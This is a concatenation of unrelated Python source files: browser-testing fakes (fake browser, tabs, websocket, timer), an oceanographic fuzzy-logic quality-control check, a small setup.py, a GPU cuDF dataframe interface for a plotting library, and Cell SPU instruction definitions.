  """Minimal stand-in for a local HTTP server used by tests."""

  def UrlOf(self, url):
    # The requested URL is irrelevant to the fake; always hand back the
    # same canned file URL.
    del url  # unused
    return 'file:///foo'


class FakePossibleBrowser(object):
  """Fake PossibleBrowser that hands out one canned _FakeBrowser.

  Optional hooks:
    execute_on_startup: called with no args at the start of Create().
    execute_after_browser_creation: called with the browser in Create().
  """

  def __init__(self, execute_on_startup=None,
               execute_after_browser_creation=None):
    self._returned_browser = _FakeBrowser(FakeLinuxPlatform())
    self.browser_type = 'linux'
    self.supports_tab_control = False
    self.is_remote = False
    self.execute_on_startup = execute_on_startup
    self.execute_after_browser_creation = execute_after_browser_creation

  @property
  def returned_browser(self):
    """The browser object that will be returned through later API calls."""
    return self._returned_browser

  def Create(self, finder_options):
    del finder_options  # unused
    # Hook ordering matters: startup hook first, then the creation hook.
    if self.execute_on_startup is not None:
      self.execute_on_startup()
    if self.execute_after_browser_creation is not None:
      self.execute_after_browser_creation(self._returned_browser)
    return self._returned_browser

  @property
  def platform(self):
    """The platform object from the returned browser.

    To change this or set it up, change the returned browser's
    platform.
    """
    return self._returned_browser.platform

  def IsRemote(self):
    return self.is_remote

  def SetCredentialsPath(self, _):
    pass


class FakeSharedPageState(shared_page_state.SharedPageState):
  """SharedPageState whose browser discovery yields a FakePossibleBrowser.

  Note: the previous redundant __init__ (which only forwarded its arguments
  to the base class) has been removed; the inherited constructor is used.
  """

  def _GetPossibleBrowser(self, test, finder_options):
    """Return a configured FakePossibleBrowser instead of a real one."""
    possible = FakePossibleBrowser()
    self.ConfigurePossibleBrowser(possible)
    return possible

  def ConfigurePossibleBrowser(self, possible_browser):
    """Override this to configure the PossibleBrowser.

    Can make changes to the browser's configuration here via e.g.:
       possible_browser.returned_browser.returned_system_info = ...
    """
    pass

  def DidRunStory(self, results):
    # TODO(kbr): add a test which throws an exception from DidRunStory
    # to verify the fix from https://crrev.com/86984d5fc56ce00e7b37ebe .
    super(FakeSharedPageState, self).DidRunStory(results)


class FakeSystemInfo(system_info.SystemInfo):
  """SystemInfo pre-populated with a fake GPU description.

  Args:
    model_name: forwarded to SystemInfo.
    gpu_dict: GPU description dict; defaults to fake_gpu_info.FAKE_GPU_INFO.
    command_line: forwarded to SystemInfo.
  """
  def __init__(self, model_name='', gpu_dict=None, command_line=''):
    # `is None` (identity), not `== None` (equality), is the correct
    # sentinel check for a defaulted argument.
    if gpu_dict is None:
      gpu_dict = fake_gpu_info.FAKE_GPU_INFO
    super(FakeSystemInfo, self).__init__(model_name, gpu_dict, command_line)


class _FakeBrowserFinderOptions(browser_options.BrowserFinderOptions):
  """BrowserFinderOptions carrying a pre-built FakePossibleBrowser."""

  def __init__(self, execute_on_startup=None,
               execute_after_browser_creation=None, *args, **kwargs):
    browser_options.BrowserFinderOptions.__init__(self, *args, **kwargs)
    self.fake_possible_browser = FakePossibleBrowser(
        execute_on_startup=execute_on_startup,
        execute_after_browser_creation=execute_after_browser_creation)

def CreateBrowserFinderOptions(browser_type=None, execute_on_startup=None,
                               execute_after_browser_creation=None):
  """Creates fake browser finder options for discovering a browser."""
  options = _FakeBrowserFinderOptions(
      browser_type=browser_type,
      execute_on_startup=execute_on_startup,
      execute_after_browser_creation=execute_after_browser_creation)
  return options


# Internal classes. Note that end users may still need to both call
# and mock out methods of these classes, but they should not be
# subclassed.

class _FakeBrowser(object):
  """Fake Browser; internal, but callers may invoke or mock its methods."""

  def __init__(self, platform):
    self._tabs = _FakeTabList(self)
    # Fake the creation of the first tab.
    self._tabs.New()
    self._returned_system_info = FakeSystemInfo()
    self._platform = platform
    self._browser_type = 'release'
    # Set when a tab navigates to chrome://crash; checked by _FakeTabList.
    self._is_crashed = False

  @property
  def platform(self):
    return self._platform

  @platform.setter
  def platform(self, incoming):
    """Allows overriding of the fake browser's platform object."""
    assert isinstance(incoming, FakePlatform)
    self._platform = incoming

  @property
  def returned_system_info(self):
    """The object which will be returned from calls to GetSystemInfo."""
    return self._returned_system_info

  @returned_system_info.setter
  def returned_system_info(self, incoming):
    """Allows overriding of the returned SystemInfo object.

    Incoming argument must be an instance of FakeSystemInfo."""
    assert isinstance(incoming, FakeSystemInfo)
    self._returned_system_info = incoming

  @property
  def browser_type(self):
    """The browser_type this browser claims to be ('debug', 'release', etc.)"""
    return self._browser_type

  @browser_type.setter
  def browser_type(self, incoming):
    """Allows setting of the browser_type."""
    self._browser_type = incoming

  @property
  def credentials(self):
    # A fresh no-op credentials object on every access.
    return _FakeCredentials()

  def Close(self):
    # Closing the browser clears any crashed state.
    self._is_crashed = False

  @property
  def supports_system_info(self):
    return True

  def GetSystemInfo(self):
    return self.returned_system_info

  @property
  def supports_tab_control(self):
    return True

  @property
  def tabs(self):
    return self._tabs

  def DumpStateUponFailure(self):
    # Nothing to dump for the fake.
    pass


class _FakeCredentials(object):
  def WarnIfMissingCredentials(self, _):
    pass


class _FakeTracingController(object):
  def __init__(self):
    self._is_tracing = False

  def StartTracing(self, tracing_config, timeout=10):
    self._is_tracing = True
    del tracing_config
    del timeout

  def StopTracing(self):
    self._is_tracing = False

  @property
  def is_tracing_running(self):
    return self._is_tracing

  def ClearStateIfNeeded(self):
    pass

  def IsChromeTracingSupported(self):
    return True


class _FakeNetworkController(object):
  def __init__(self):
    self.wpr_mode = None
    self.extra_wpr_args = None
    self.is_initialized = False
    self.is_open = False
    self.use_live_traffic = None

  def InitializeIfNeeded(self, use_live_traffic=False):
    self.use_live_traffic = use_live_traffic

  def UpdateTrafficSettings(self, round_trip_latency_ms=None,
      download_bandwidth_kbps=None, upload_bandwidth_kbps=None):
    pass

  def Open(self, wpr_mode, extra_wpr_args, use_wpr_go=False):
    del use_wpr_go  # Unused.
    self.wpr_mode = wpr_mode
    self.extra_wpr_args = extra_wpr_args
    self.is_open = True

  def Close(self):
    self.wpr_mode = None
    self.extra_wpr_args = None
    self.is_initialized = False
    self.is_open = False

  def StartReplay(self, archive_path, make_javascript_deterministic=False):
    del make_javascript_deterministic  # Unused.
    assert self.is_open
    self.is_initialized = archive_path is not None

  def StopReplay(self):
    self.is_initialized = False


class _FakeTab(object):
  def __init__(self, browser, tab_id):
    self._browser = browser
    self._tab_id = str(tab_id)
    self._collect_garbage_count = 0
    self.test_png = None

  @property
  def collect_garbage_count(self):
    return self._collect_garbage_count

  @property
  def id(self):
    return self._tab_id

  @property
  def browser(self):
    return self._browser

  def WaitForDocumentReadyStateToBeComplete(self, timeout=0):
    pass

  def Navigate(self, url, script_to_evaluate_on_commit=None,
               timeout=0):
    del script_to_evaluate_on_commit, timeout # unused
    if url == 'chrome://crash':
      self.browser._is_crashed = True
      raise Exception

  def WaitForDocumentReadyStateToBeInteractiveOrBetter(self, timeout=0):
    pass

  def WaitForFrameToBeDisplayed(self, timeout=0):
    pass

  def IsAlive(self):
    return True

  def CloseConnections(self):
    pass

  def CollectGarbage(self):
    self._collect_garbage_count += 1

  def Close(self):
    pass

  @property
  def screenshot_supported(self):
    return self.test_png is not None

  def Screenshot(self):
    assert self.screenshot_supported, 'Screenshot is not supported'
    return image_util.FromBase64Png(self.test_png)


class _FakeTabList(object):
  _current_tab_id = 0

  def __init__(self, browser):
    self._tabs = []
    self._browser = browser

  def New(self, timeout=300):
    del timeout  # unused
    type(self)._current_tab_id += 1
    t = _FakeTab(self._browser, type(self)._current_tab_id)
    self._tabs.append(t)
    return t

  def __iter__(self):
    return self._tabs.__iter__()

  def __len__(self):
    return len(self._tabs)

  def __getitem__(self, index):
    if self._tabs[index].browser._is_crashed:
      raise Exception
    else:
      return self._tabs[index]

  def GetTabById(self, identifier):
    """The identifier of a tab can be accessed with tab.id."""
    for tab in self._tabs:
      if tab.id == identifier:
        return tab
    return None


class FakeInspectorWebsocket(object):
  _NOTIFICATION_EVENT = 1
  _NOTIFICATION_CALLBACK = 2

  """A fake InspectorWebsocket.

  A fake that allows tests to send pregenerated data. Normal
  InspectorWebsockets allow for any number of domain handlers. This fake only
  allows up to 1 domain handler, and assumes that the domain of the response
  always matches that of the handler.
  """
  def __init__(self, mock_timer):
    self._mock_timer = mock_timer
    self._notifications = []
    self._response_handlers = {}
    self._pending_callbacks = {}
    self._handler = None

  def RegisterDomain(self, _, handler):
    self._handler = handler

  def AddEvent(self, method, params, time):
    if self._notifications:
      assert self._notifications[-1][1] < time, (
          'Current response is scheduled earlier than previous response.')
    response = {'method': method, 'params': params}
    self._notifications.append((response, time, self._NOTIFICATION_EVENT))

  def AddAsyncResponse(self, method, result, time):
    if self._notifications:
      assert self._notifications[-1][1] < time, (
          'Current response is scheduled earlier than previous response.')
    response = {'method': method, 'result': result}
    self._notifications.append((response, time, self._NOTIFICATION_CALLBACK))

  def AddResponseHandler(self, method, handler):
    self._response_handlers[method] = handler

  def SyncRequest(self, request, *args, **kwargs):
    del args, kwargs  # unused
    handler = self._response_handlers[request['method']]
    return handler(request) if handler else None

  def AsyncRequest(self, request, callback):
    self._pending_callbacks.setdefault(request['method'], []).append(callback)

  def SendAndIgnoreResponse(self, request):
    pass

  def Connect(self, _):
    pass

  def DispatchNotifications(self, timeout):
    current_time = self._mock_timer.time()
    if not self._notifications:
      self._mock_timer.SetTime(current_time + timeout + 1)
      raise websocket.WebSocketTimeoutException()

    response, time, kind = self._notifications[0]
    if time - current_time > timeout:
      self._mock_timer.SetTime(current_time + timeout + 1)
      raise websocket.WebSocketTimeoutException()

    self._notifications.pop(0)
    self._mock_timer.SetTime(time + 1)
    if kind == self._NOTIFICATION_EVENT:
      self._handler(response)
    elif kind == self._NOTIFICATION_CALLBACK:
      callback = self._pending_callbacks.get(response['method']).pop(0)
      callback(response)
    else:
      raise Exception('Unexpected response type')


class FakeTimer(object):
  """Replace `module.time` with a controllable fake clock.

  Args:
    module: optional module whose `time` attribute is patched to this
      object until Restore() (or garbage collection) puts it back.
  """

  def __init__(self, module=None):
    self._elapsed_time = 0
    self._module = module
    self._actual_time = None
    if module:
      assert isinstance(module, ModuleType)
      self._actual_time = module.time
      self._module.time = self

  def sleep(self, time):
    # Advancing the fake clock stands in for actually sleeping.
    self._elapsed_time += time

  def time(self):
    return self._elapsed_time

  def SetTime(self, time):
    self._elapsed_time = time

  def __del__(self):
    self.Restore()

  def Restore(self):
    """Put the real time function back and drop the module reference."""
    if not self._module:
      return
    self._module.time = self._actual_time
    self._actual_time = None
    self._module = None


# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst

"""
    Quality Control based on fuzzy logic.
"""

import logging

import numpy as np

from .core import QCCheckVar
from .gradient import gradient
from .spike import spike
from .woa_normbias import woa_normbias
from cotede.fuzzy import fuzzy_uncertainty

module_logger = logging.getLogger(__name__)


def fuzzylogic(features, cfg, require="all"):
    """Estimate the fuzzy-logic uncertainty for the given features.

    Parameters
    ----------
    features : dict
        Mapping of feature name to feature values.
    cfg : dict
        Test configuration. Must provide "features" (mapping of required
        feature names) and "output"; may override "require".
    require : str
        When "all" (the default), every feature listed in cfg["features"]
        must be present in `features`, otherwise KeyError is raised.

        FIXME: Think about, should I return 0, or have an assert, and at qc.py
          all qc tests are applied with a try, and in case it fails it flag
          0s.
    """
    require = cfg.get("require", require)

    if (require == "all") and not np.all([f in features for f in cfg["features"]]):
        # Bug fix: the original used "%s" inside str.format(), so the
        # feature list was never interpolated. Use lazy %-style logger args.
        module_logger.warning(
            "Not all features (%s) required by fuzzy logic are available",
            cfg["features"].keys(),
        )
        raise KeyError("Missing features required by fuzzy logic")

    uncertainty = fuzzy_uncertainty(
        data=features, features=cfg["features"], output=cfg["output"], require=require
    )

    return uncertainty


class FuzzyLogic(QCCheckVar):
    """Fuzzy-logic QC check for one variable.

    Builds the features required by the configuration, runs fuzzylogic()
    on them, and maps the resulting uncertainty onto flags 1 (lowest
    uncertainty) through 4 (highest).
    """
    def set_features(self):
        """Compute each configured feature plus the fuzzylogic uncertainty."""
        self.features = {}
        for v in [f for f in self.cfg["features"] if f not in self.features]:
            if v == "woa_bias":
                woa_comparison = woa_normbias(self.data, self.varname, self.attrs)
                self.features[v] = woa_comparison["woa_bias"]
            elif v == "woa_normbias":
                woa_comparison = woa_normbias(self.data, self.varname, self.attrs)
                self.features[v] = woa_comparison["woa_normbias"]
            elif v == "spike":
                self.features[v] = spike(self.data[self.varname])
            elif v == "gradient":
                self.features[v] = gradient(self.data[self.varname])

        self.features["fuzzylogic"] = fuzzylogic(self.features, self.cfg)


    def test(self):
        """Convert the fuzzy uncertainty into int8 flags (1..4)."""
        self.flags = {}
        cfg = self.cfg
        flag = np.zeros(np.shape(self.data[self.varname]), dtype="i1")

        uncertainty = self.features["fuzzylogic"]
        # FIXME: As it is now, it will have no zero flag value. Think about cases
        #   where some values in a profile would not be estimated, hence flag=0
        # I needed to use np.nonzeros because now uncertainty is a masked array,
        #   to accept when a feature is masked.
        flag[np.nonzero(uncertainty <= 0.29)] = 1
        flag[np.nonzero((uncertainty > 0.29) & (uncertainty <= 0.34))] = 2
        flag[np.nonzero((uncertainty > 0.34) & (uncertainty <= 0.72))] = 3
        flag[np.nonzero(uncertainty > 0.72)] = 4

        self.flags["fuzzylogic"] = flag

from setuptools import setup, find_packages


# Packaging metadata for the `gelato.models` distribution. `gelato` is a
# namespace package, so other gelato.* distributions can share the prefix.
setup(name='gelato.models',
      version='0.1.2',
      description='Gelato models',
      namespace_packages=['gelato'],
      long_description='',
      author='',
      author_email='',
      license='',
      url='',
      include_package_data=True,
      packages=find_packages(exclude=['tests']),
      install_requires=['django', 'tower'])

import sys
import warnings

try:
    import itertools.izip as zip
except ImportError:
    pass

from itertools import product

import numpy as np

from .. import util
from ..dimension import dimension_name
from ..element import Element
from ..ndmapping import NdMapping, item_check, sorted_context
from .interface import DataError, Interface
from .pandas import PandasInterface
from .util import finite_range


class cuDFInterface(PandasInterface):
    """
    The cuDFInterface allows a Dataset objects to wrap a cuDF
    DataFrame object. Using cuDF allows working with columnar
    data on a GPU. Most operations leave the data in GPU memory,
    however to plot the data it has to be loaded into memory.

    The cuDFInterface covers almost the complete API exposed
    by the PandasInterface with two notable exceptions:

    1) Aggregation and groupby do not have a consistent sort order
       (see https://github.com/rapidsai/cudf/issues/4237)
    2) Not all functions can be easily applied to a cuDF so
       some functions applied with aggregate and reduce will not work.
    """

    datatype = 'cuDF'

    # No eager type registration: cudf is imported lazily (see loaded()).
    types = ()

    @classmethod
    def loaded(cls):
        """Whether cudf has already been imported in this process."""
        return 'cudf' in sys.modules

    @classmethod
    def applies(cls, obj):
        """Whether obj is a cudf DataFrame/Series this interface can wrap."""
        if not cls.loaded():
            return False
        import cudf
        return isinstance(obj, (cudf.DataFrame, cudf.Series))

    @classmethod
    def init(cls, eltype, data, kdims, vdims):
        """Coerce data to a cudf.DataFrame and resolve kdims/vdims.

        Mirrors PandasInterface.init: infers missing dimensions from the
        columns (and index), validates them, and returns the
        (data, dimensions, extra) triple expected by the Dataset machinery.
        """
        import cudf
        import pandas as pd

        element_params = eltype.param.objects()
        kdim_param = element_params['kdims']
        vdim_param = element_params['vdims']

        if isinstance(data, (cudf.Series, pd.Series)):
            data = data.to_frame()

        if not isinstance(data, cudf.DataFrame):
            # Round-trip any other input type through pandas.
            data, _, _ = PandasInterface.init(eltype, data, kdims, vdims)
            data = cudf.from_pandas(data)

        columns = list(data.columns)
        ncols = len(columns)
        index_names = [data.index.name]
        if index_names == [None]:
            index_names = ['index']
        if eltype._auto_indexable_1d and ncols == 1 and kdims is None:
            kdims = list(index_names)

        if isinstance(kdim_param.bounds[1], int):
            ndim = min([kdim_param.bounds[1], len(kdim_param.default)])
        else:
            ndim = None
        nvdim = vdim_param.bounds[1] if isinstance(vdim_param.bounds[1], int) else None
        # Fill in whichever of kdims/vdims were not supplied explicitly.
        if kdims and vdims is None:
            vdims = [c for c in columns if c not in kdims]
        elif vdims and kdims is None:
            kdims = [c for c in columns if c not in vdims][:ndim]
        elif kdims is None:
            kdims = list(columns[:ndim])
            if vdims is None:
                vdims = [d for d in columns[ndim:((ndim+nvdim) if nvdim else None)]
                         if d not in kdims]
        elif kdims == [] and vdims is None:
            vdims = list(columns[:nvdim if nvdim else None])

        # Handle reset of index if kdims reference index by name
        for kd in kdims:
            kd = dimension_name(kd)
            if kd in columns:
                continue
            if any(kd == ('index' if name is None else name)
                   for name in index_names):
                data = data.reset_index()
                break
        if any(isinstance(d, (np.int64, int)) for d in kdims+vdims):
            raise DataError("cudf DataFrame column names used as dimensions "
                            "must be strings not integers.", cls)

        if kdims:
            kdim = dimension_name(kdims[0])
            if eltype._auto_indexable_1d and ncols == 1 and kdim not in columns:
                # Synthesize an integer key column for 1D auto-indexing.
                data = data.copy()
                data.insert(0, kdim, np.arange(len(data)))

        for d in kdims+vdims:
            d = dimension_name(d)
            if len([c for c in columns if c == d]) > 1:
                raise DataError('Dimensions may not reference duplicated DataFrame '
                                'columns (found duplicate %r columns). If you want to plot '
                                'a column against itself simply declare two dimensions '
                                'with the same name. '% d, cls)
        return data, {'kdims':kdims, 'vdims':vdims}, {}


    @classmethod
    def range(cls, dataset, dimension):
        """Return the (min, max) of a dimension; (NaN, NaN) for objects."""
        dimension = dataset.get_dimension(dimension, strict=True)
        column = dataset.data[dimension.name]
        if dimension.nodata is not None:
            column = cls.replace_value(column, dimension.nodata)
        if column.dtype.kind == 'O':
            return np.NaN, np.NaN
        else:
            return finite_range(column, column.min(), column.max())


    @classmethod
    def values(cls, dataset, dim, expanded=True, flat=True, compute=True,
               keep_index=False):
        """Return the values of a dimension, optionally de-duplicated.

        `compute=True` copies to host memory (values_host); otherwise the
        GPU-resident values are returned when available.
        """
        dim = dataset.get_dimension(dim, strict=True)
        data = dataset.data[dim.name]
        if not expanded:
            data = data.unique()
            return data.values_host if compute else data.values
        elif keep_index:
            return data
        elif compute:
            return data.values_host
        try:
            return data.values
        except Exception:
            return data.values_host

    @classmethod
    def groupby(cls, dataset, dimensions, container_type, group_type, **kwargs):
        """Group the dataset along the supplied dimensions."""
        # Get dimensions information
        dimensions = [dataset.get_dimension(d).name for d in dimensions]
        kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]

        # Update the kwargs appropriately for Element group types
        group_kwargs = {}
        group_type = dict if group_type == 'raw' else group_type
        if issubclass(group_type, Element):
            group_kwargs.update(util.get_param_values(dataset))
            group_kwargs['kdims'] = kdims
        group_kwargs.update(kwargs)

        # Propagate dataset
        group_kwargs['dataset'] = dataset.dataset

        # Find all the keys along supplied dimensions.
        # Bug fix: the generator previously indexed dataset.data with
        # dimensions[0] for every d, so multi-dimensional groupby always
        # used the first dimension's unique values.
        keys = product(*(dataset.data[d].unique().values_host for d in dimensions))

        # Iterate over the unique entries applying selection masks
        grouped_data = []
        for unique_key in util.unique_iterator(keys):
            group_data = dataset.select(**dict(zip(dimensions, unique_key)))
            if not len(group_data):
                continue
            group_data = group_type(group_data, **group_kwargs)
            grouped_data.append((unique_key, group_data))

        if issubclass(container_type, NdMapping):
            with item_check(False), sorted_context(False):
                kdims = [dataset.get_dimension(d) for d in dimensions]
                return container_type(grouped_data, kdims=kdims)
        else:
            return container_type(grouped_data)


    @classmethod
    def select_mask(cls, dataset, selection):
        """
        Given a Dataset object and a dictionary with dimension keys and
        selection keys (i.e. tuple ranges, slices, sets, lists, or literals)
        return a boolean mask over the rows in the Dataset object that
        have been selected.
        """
        mask = None
        for dim, sel in selection.items():
            if isinstance(sel, tuple):
                sel = slice(*sel)
            arr = cls.values(dataset, dim, keep_index=True)
            if util.isdatetime(arr) and util.pd:
                try:
                    sel = util.parse_datetime_selection(sel)
                except Exception:
                    # Best-effort datetime coercion; fall back to raw values.
                    pass

            new_masks = []
            if isinstance(sel, slice):
                with warnings.catch_warnings():
                    warnings.filterwarnings('ignore', r'invalid value encountered')
                    if sel.start is not None:
                        new_masks.append(sel.start <= arr)
                    if sel.stop is not None:
                        new_masks.append(arr < sel.stop)
                if not new_masks:
                    continue
                new_mask = new_masks[0]
                for imask in new_masks[1:]:
                    new_mask &= imask
            elif isinstance(sel, (set, list)):
                for v in sel:
                    new_masks.append(arr==v)
                if not new_masks:
                    continue
                new_mask = new_masks[0]
                for imask in new_masks[1:]:
                    new_mask |= imask
            elif callable(sel):
                new_mask = sel(arr)
            else:
                new_mask = arr == sel

            if mask is None:
                mask = new_mask
            else:
                mask &= new_mask
        return mask

    @classmethod
    def select(cls, dataset, selection_mask=None, **selection):
        """Apply a selection, unpacking a scalar when it is fully indexed."""
        df = dataset.data
        if selection_mask is None:
            selection_mask = cls.select_mask(dataset, selection)

        indexed = cls.indexed(dataset, selection)
        if selection_mask is not None:
            df = df.loc[selection_mask]
        if indexed and len(df) == 1 and len(dataset.vdims) == 1:
            return df[dataset.vdims[0].name].iloc[0]
        return df

    @classmethod
    def concat_fn(cls, dataframes, **kwargs):
        import cudf
        return cudf.concat(dataframes, **kwargs)

    @classmethod
    def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
        # dim_pos/vdim are accepted for interface compatibility but cudf
        # appends new columns at the end.
        data = dataset.data.copy()
        if dimension.name not in data:
            data[dimension.name] = values
        return data

    @classmethod
    def aggregate(cls, dataset, dimensions, function, **kwargs):
        """Aggregate over the value dimensions, grouped by `dimensions`.

        Returns the aggregated DataFrame and the list of value dimensions
        that the cudf aggregation dropped.
        """
        data = dataset.data
        cols = [d.name for d in dataset.kdims if d in dimensions]
        vdims = dataset.dimensions('value', label='name')
        reindexed = data[cols+vdims]
        agg = function.__name__
        if len(dimensions):
            # Map numpy ufunc names onto the cudf groupby method names.
            agg_map = {'amin': 'min', 'amax': 'max'}
            agg = agg_map.get(agg, agg)
            grouped = reindexed.groupby(cols, sort=False)
            if not hasattr(grouped, agg):
                raise ValueError('%s aggregation is not supported on cudf DataFrame.' % agg)
            df = getattr(grouped, agg)().reset_index()
        else:
            agg_map = {'amin': 'min', 'amax': 'max', 'size': 'count'}
            agg = agg_map.get(agg, agg)
            if not hasattr(reindexed, agg):
                raise ValueError('%s aggregation is not supported on cudf DataFrame.' % agg)
            agg = getattr(reindexed, agg)()
            data = dict(((col, [v]) for col, v in zip(agg.index.values_host, agg.to_array())))
            df = util.pd.DataFrame(data, columns=list(agg.index.values_host))

        dropped = []
        for vd in vdims:
            if vd not in df.columns:
                dropped.append(vd)
        return df, dropped


    @classmethod
    def iloc(cls, dataset, index):
        """Positional indexing: returns a scalar, Series, or DataFrame."""
        import cudf

        rows, cols = index
        scalar = False
        columns = list(dataset.data.columns)
        if isinstance(cols, slice):
            cols = [d.name for d in dataset.dimensions()][cols]
        elif np.isscalar(cols):
            scalar = np.isscalar(rows)
            cols = [dataset.get_dimension(cols).name]
        else:
            cols = [dataset.get_dimension(d).name for d in index[1]]
        col_index = [columns.index(c) for c in cols]
        if np.isscalar(rows):
            rows = [rows]

        if scalar:
            return dataset.data[cols[0]].iloc[rows[0]]
        result = dataset.data.iloc[rows, col_index]

        # cuDF does not handle single rows and cols indexing correctly
        # as of cudf=0.10.0 so we have to convert Series back to DataFrame
        if isinstance(result, cudf.Series):
            if len(cols) == 1:
                result = result.to_frame(cols[0])
            else:
                result = result.to_frame().T
        return result


    @classmethod
    def sort(cls, dataset, by=None, reverse=False):
        # Default changed from a shared mutable [] to None (same behavior,
        # avoids the mutable-default pitfall).
        cols = [dataset.get_dimension(d, strict=True).name for d in (by or [])]
        return dataset.data.sort_values(by=cols, ascending=not reverse)


    @classmethod
    def dframe(cls, dataset, dimensions):
        """Copy the (optionally column-subset) data to a pandas DataFrame."""
        if dimensions:
            return dataset.data[dimensions].to_pandas()
        else:
            return dataset.data.to_pandas()

# Make the cuDF backend discoverable by the Interface dispatch machinery.
Interface.register(cuDFInterface)

# Copyright (c) 2006-2009 The Trustees of Indiana University.                   
# All rights reserved.                                                          
#                                                                               
# Redistribution and use in source and binary forms, with or without            
# modification, are permitted provided that the following conditions are met:   
#                                                                               
# - Redistributions of source code must retain the above copyright notice, this 
#   list of conditions and the following disclaimer.                            
#                                                                               
# - Redistributions in binary form must reproduce the above copyright notice,   
#   this list of conditions and the following disclaimer in the documentation   
#   and/or other materials provided with the distribution.                      
#                                                                               
# - Neither the Indiana University nor the names of its contributors may be used
#   to endorse or promote products derived from this software without specific  
#   prior written permission.                                                   
#                                                                               
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"   
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE     
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE   
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL    
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR    
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER    
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.          

from corepy.spre.spe import Instruction, DispatchInstruction, Register
from spu_insts import *

# Assigned explicitly because the license header above occupies the spot a
# module docstring would normally take.
__doc__="""
ISA for the Cell Broadband Engine's SPU.
"""

# Quadword load/store and "generate controls for insertion" instructions
# (x-form: register + register addressing). The `cycles` tuples feed
# corepy's timing model; their exact field semantics are defined by corepy
# -- confirm there before relying on them.
class lqx(Instruction):
  # Load quadword (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':452}
  cycles = (1, 6, 0)


class stqx(Instruction):
  # Store quadword (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':324}
  cycles = (1, 6, 0)


class cbx(Instruction):
  # Generate controls for byte insertion (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':468}
  cycles = (1, 4, 0)


class chx(Instruction):
  # Generate controls for halfword insertion (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':469}
  cycles = (1, 4, 0)


class cwx(Instruction):
  # Generate controls for word insertion (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':470}
  cycles = (1, 4, 0)


class cdx(Instruction):
  # Generate controls for doubleword insertion (x-form).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':471}
  cycles = (1, 4, 0)


# Integer add/subtract family, including the extended (carry/borrow chain)
# variants.
class ah(Instruction):
  # Add halfword.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':200}
  cycles = (0, 2, 0)


class a(Instruction):
  # Add word.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':192}
  cycles = (0, 2, 0)


class sfh(Instruction):
  # Subtract from halfword (rt = rb - ra).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':72}
  cycles = (0, 2, 0)


class sf(Instruction):
  # Subtract from word (rt = rb - ra).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':64}
  cycles = (0, 2, 0)


class addx(Instruction):
  # Add extended (consumes the carry bit held in rt).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':832}
  cycles = (0, 2, 0)


class cg(Instruction):
  # Carry generate.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':194}
  cycles = (0, 2, 0)


class cgx(Instruction):
  # Carry generate extended.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':834}
  cycles = (0, 2, 0)


class sfx(Instruction):
  # Subtract from extended.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':833}
  cycles = (0, 2, 0)


class bg(Instruction):
  # Borrow generate.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':66}
  cycles = (0, 2, 0)


class bgx(Instruction):
  # Borrow generate extended.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':835}
  cycles = (0, 2, 0)


# 16x16-bit multiply family.
class mpy(Instruction):
  # Multiply (signed lower halfwords).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':964}
  cycles = (0, 7, 0)


class mpyu(Instruction):
  # Multiply unsigned (lower halfwords).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':972}
  cycles = (0, 7, 0)


class mpyh(Instruction):
  # Multiply high.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':965}
  cycles = (0, 7, 0)


class mpys(Instruction):
  # Multiply and shift right.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':967}
  cycles = (0, 7, 0)


class mpyhh(Instruction):
  # Multiply high high (upper halfwords).
  machine_inst = OPCD_B_A_T
  params = {'OPCD':966}
  cycles = (0, 7, 0)


class mpyhha(Instruction):
  # Multiply high high and add.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':838}
  cycles = (0, 7, 0)


class mpyhhu(Instruction):
  # Multiply high high unsigned.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':974}
  cycles = (0, 7, 0)


class mpyhhau(Instruction):
  # Multiply high high unsigned and add.
  machine_inst = OPCD_B_A_T
  params = {'OPCD':846}
  cycles = (0, 7, 0)


class clz(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':677}
  cycles = (0, 2, 0)


class cntb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':692}
  cycles = (0, 4, 0)


class fsmb(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':438}
  cycles = (1, 4, 0)


class fsmh(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':437}
  cycles = (1, 4, 0)


class fsm(Instruction):
  machine_inst = OPCD_A_T
  params = {'OPCD':436}
  cycles = (1, 4, 0)


